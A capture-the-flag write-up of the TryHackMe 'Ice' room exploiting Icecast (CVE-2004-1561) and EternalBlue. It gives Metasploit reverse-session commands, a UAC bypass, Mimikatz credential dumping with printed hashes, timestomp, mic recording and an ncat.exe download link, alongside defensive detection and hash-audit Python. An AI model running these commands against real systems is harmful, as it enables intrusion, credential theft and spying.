TryHackMe - Ice
Published: 2023-07-08

Recon
Nmap service scan
nmap -sV -vv $IP 
This room covers the service running on port 8000 (Icecast).
Nmap vulnerability scan
nmap --script=vuln -vv $IP
This box is also vulnerable to EternalBlue (MS17-010, CVE-2017-0143).
Research the exploit. The room wants us to research a specific CVE from 2004.
cvedetails.com results for “Icecast”

Hmmm… No CVE results from 2004.
exploit-db.com results for “Icecast”

The correct CVE is linked from the exploit-db results (the entries dated 2004-10-06 or 2004-10-12).
ChatGPT results for Icecast vulnerabilities from 2004

We now know the CVE in question is CVE-2004-1561.
cvedetails.com results for CVE-2004-1561

cvedetails classifies the vulnerability as “Execute Code” via a buffer “Overflow”, i.e. remote code execution through a buffer overflow in the Icecast HTTP handler.
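The check a defender would want for this bug is simple once you know its shape. The following Python is an added example for this writeup, not code from the room, exploit-db or Metasploit. It assumes the public description of CVE-2004-1561 (Icecast 2.0.1 and earlier keep request headers in a fixed-size table, so a request with 32 or more header lines overflows it) and uses constructed sample requests rather than captured traffic; the per-line length ceiling is an assumed, tunable value.

```python
"""Flag HTTP requests shaped like the Icecast header-count overflow (CVE-2004-1561).

Added example for this writeup; it is not the room's, exploit-db's or Metasploit's code.
It assumes the public description of CVE-2004-1561: Icecast 2.0.1 and earlier keep
request headers in a fixed-size table, so a request with 32 or more header lines
overflows it. The sample requests below are constructed, not captured traffic.
"""
from dataclasses import dataclass, field

# From the public advisory: 31 header lines fit, the 32nd writes past the table.
MAX_SAFE_HEADERS = 31
# Per-line length ceiling for the secondary check; an assumed, tunable value.
MAX_HEADER_LINE = 1024


@dataclass
class Verdict:
    request_line: str
    header_count: int
    suspicious: bool
    reasons: list[str] = field(default_factory=list)


def parse_request(raw: bytes) -> tuple[str, list[str]]:
    """Return (request line, header lines) from the head of a raw HTTP request.

    Only the part before the blank line is parsed; the body does not matter for
    this check. Bare LF line endings are tolerated alongside CRLF.
    """
    head, _, _body = raw.replace(b"\r\n", b"\n").partition(b"\n\n")
    lines = [ln.decode("latin-1") for ln in head.split(b"\n") if ln]
    if not lines:
        return "", []
    return lines[0], lines[1:]


def inspect_request(raw: bytes) -> Verdict:
    """Apply the header-count and header-shape checks to one request."""
    request_line, headers = parse_request(raw)
    reasons = []
    if len(headers) > MAX_SAFE_HEADERS:
        reasons.append(f"{len(headers)} header lines exceeds {MAX_SAFE_HEADERS}")
    oversized = sum(1 for h in headers if len(h) > MAX_HEADER_LINE)
    if oversized:
        reasons.append(f"{oversized} header line(s) longer than {MAX_HEADER_LINE} bytes")
    malformed = sum(1 for h in headers if ":" not in h)
    if malformed:
        reasons.append(f"{malformed} header line(s) without a colon")
    return Verdict(request_line, len(headers), bool(reasons), reasons)


def make_request(header_count: int) -> bytes:
    """Build a constructed GET request carrying the given number of header lines."""
    headers = b"".join(b"X-Test-%d: x\r\n" % i for i in range(header_count))
    return b"GET / HTTP/1.0\r\n" + headers + b"\r\n"


# Constructed samples: an ordinary client request and a header flood.
BENIGN = b"GET / HTTP/1.0\r\nHost: icecast.example\r\nUser-Agent: curl/8.0\r\n\r\n"
FLOOD = make_request(40)

if __name__ == "__main__":
    for sample in (BENIGN, FLOOD):
        v = inspect_request(sample)
        print(f"{v.request_line!r}: {v.header_count} headers, "
              f"{'SUSPICIOUS' if v.suspicious else 'ok'} {v.reasons}")
```

Run it as a script to see the benign request pass and the 40-header request flagged. The same `inspect_request` function can sit behind a proxy or be fed reassembled TCP payloads from a capture; the point is that the trigger condition is a count, not a signature, so a header-count threshold catches variants that change the header names or payload bytes.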
Digging a bit deeper… searchsploit results for “Icecast”

View the exploit
cat /usr/share/exploitdb/exploits/windows_x86/remote/16763.rb
Metasploit search results for “icecast”

Metasploit command
msfconsole -x "use exploit/windows/http/icecast_header;setg RHOSTS $IP;setg LHOST tun0;run"
Note: tun0 may not be the only tun interface. Run ‘ip addr’ to view interfaces; the command above may need tun1 instead.
The exploit has run. Get our user ID and view the Icecast process.

We get the same PID if we run getpid. That process is us.
View all processes

Elevate our privileges
View our privileges
getprivs 
Get suggested exploits
run post/multi/recon/local_exploit_suggester 
Use a suggested exploit
use exploit/windows/local/bypassuac_eventvwr 
Once the exploit has run, view our sessions; session 2 is the elevated one.

Our user ID is the same as in the un-elevated session

Our privileges in the elevated session are different

View processes in the elevated session. Notice the different results between sessions? Our privileged shell can see the owners of all processes.

Migrate to another process

Load Mimikatz aka Kiwi

Get credentials

Dump the hashes with “hashdump”
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Dark:1000:aad3b435b51404eeaad3b435b51404ee:7c4fe5eada682714a036e39378362bab:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Spin up an RDP session using the user Dark’s credentials to authenticate.
run post/windows/manage/enable_rdp
This opens the RDP port and starts the service on the target if it is not already enabled.
rdesktop $IP
Remote desktop, just give it an IP. This command is run on the local machine, of course.
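The hashdump output above is also what an administrator would audit after an incident like this. The following Python is an added example for this writeup, not part of the room or of Metasploit; it parses the three pwdump-format lines shown above (user:RID:LM hash:NT hash:::) and reports accounts that need attention. The two constants are the well-known hashes of the empty string: aad3b435... is the LM hash of an empty password (and what Windows stores when LM hashing is disabled), 31d6cfe0... is the NT hash of an empty password.

```python
"""Audit hashdump output for blank passwords and stored LM hashes.

Added example for this writeup; it is not part of the room or of Metasploit.
Input is the three hashdump lines from the writeup in pwdump format
(user:RID:LM hash:NT hash:::). The two constants are the well-known hashes of
the empty string: aad3b435... is the LM hash of an empty password (and what
Windows stores when LM hashing is disabled), 31d6cfe0... is the NT hash of an
empty password.
"""
from dataclasses import dataclass

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# The hashdump lines from the writeup, used as sample input.
HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Dark:1000:aad3b435b51404eeaad3b435b51404ee:7c4fe5eada682714a036e39378362bab:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""


@dataclass
class Account:
    name: str
    rid: int
    lm_hash: str
    nt_hash: str


def parse_hashdump(text: str) -> list[Account]:
    """Parse pwdump-style lines; blank lines are skipped, malformed ones raise."""
    accounts = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        parts = line.split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            raise ValueError(f"not a pwdump line: {line!r}")
        name, rid, lm, nt = parts[:4]
        if len(lm) != 32 or len(nt) != 32:
            raise ValueError(f"hash field has wrong length: {line!r}")
        accounts.append(Account(name, int(rid), lm.lower(), nt.lower()))
    return accounts


def audit(accounts: list[Account]) -> dict[str, list[str]]:
    """Return {account name: [findings]} for accounts that need attention."""
    findings: dict[str, list[str]] = {}
    for acct in accounts:
        notes = []
        if acct.nt_hash == EMPTY_NT:
            notes.append("blank password")
            if acct.rid == 500:
                # RID 500 is the built-in Administrator; on many hosts it is
                # disabled with a blank password, so confirm the account status.
                notes.append("built-in Administrator (RID 500): verify it is disabled")
        if acct.lm_hash != EMPTY_LM:
            notes.append("LM hash stored: LM hashing is enabled on this host")
        if notes:
            findings[acct.name] = notes
    return findings


def audit_text(text: str) -> dict[str, list[str]]:
    """Convenience wrapper: parse then audit."""
    return audit(parse_hashdump(text))


if __name__ == "__main__":
    for name, notes in audit_text(HASHDUMP).items():
        print(f"{name}: {'; '.join(notes)}")
```

On this box the output shows Administrator and Guest with blank passwords (both commonly disabled built-in accounts, which is why the RID 500 note asks you to confirm status rather than assume a hole) and Dark with a real NT hash and no LM hash stored. A non-empty LM field on any line is the finding to act on first, since LM hashes are trivially crackable and their presence means the LM policy is off.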

View the target’s desktop in real time in a browser window.
screenshare 
Mess with timestamps.
timestomp desktop.ini -m "07/08/2023 15:30:00" 
Record audio from the target device’s microphone.
record_mic
Don’t think this works on this box…
Create a Kerberos golden ticket to take you where you’re going in life…
golden_ticket_create
load kiwi is required for this command. Also, this box isn’t domain joined.
Let’s p0wn the box using the EternalBlue exploit
msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue;setg RHOSTS $IP;setg LHOST tun0;run"
Ridiculously EZ.

Here’s an exploit to try out and work on…
Icecast 2.0.1 (Win32) - Remote Code Execution (1)
https://www.exploit-db.com/exploits/568
Here’s a copy of ncat.exe in case we want to rewrite the exploit…
https://timsonner.com/ncat.exe